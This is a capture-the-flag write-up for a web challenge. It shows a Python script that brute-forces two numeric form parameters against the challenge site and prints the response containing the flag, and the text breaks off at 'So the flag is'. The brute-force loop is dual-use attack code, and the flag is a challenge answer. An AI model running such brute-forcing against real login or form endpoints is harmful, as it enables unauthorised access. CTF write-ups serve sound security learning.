Web - Et tu, Brute? - writeup
Description
I want to see how many people are actually my friends and aren’t just pretending! Only my best friends get flags. You can check our friendship status at this website. mhsctf-ettubrute.0xmmalik.repl.co (you may need to wait for the site to wake up)
Writeup
So I went ahead and wrote a simple brute force program in python:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
| #!/usr/bin/env python3
import requests
from requests.adapters import HTTPAdapter
from requests.packages.urllib3.util.retry import Retry
# the url we are going to post to
url='https://mhsctf-ettubrute.0xmmalik.repl.co/status.php'
# the two parameters we need to bruteforce
# they are integers between 1 and 100
number=0
number2=0
# define the 'failed' response
failed="Sorry, you're clearly not my friend if you don't know my favorite and second favorite numbers!"
session = requests.Session()
retry = Retry(connect=3, backoff_factor=0.5)
adapter = HTTPAdapter(max_retries=retry)
session.mount('http://', adapter)
session.mount('https://', adapter)
# iterate through the possible combinations using two nested for loops
for number in range(100):
for number2 in range(100):
postobj = {'number': number, 'number2': number2}
result = session.post(url, data = postobj)
if (result.text != failed):
print('got the flag: ')
print(result.text)
|
After some minutes of running my bruteforce utility i got the following response:
1
2
| got the flag:
Wow! You must really be my friend if you know my favorite and second favorite numbers! Here's a flag for you: flag{pur3_s7r3ngth}
|
So the flag is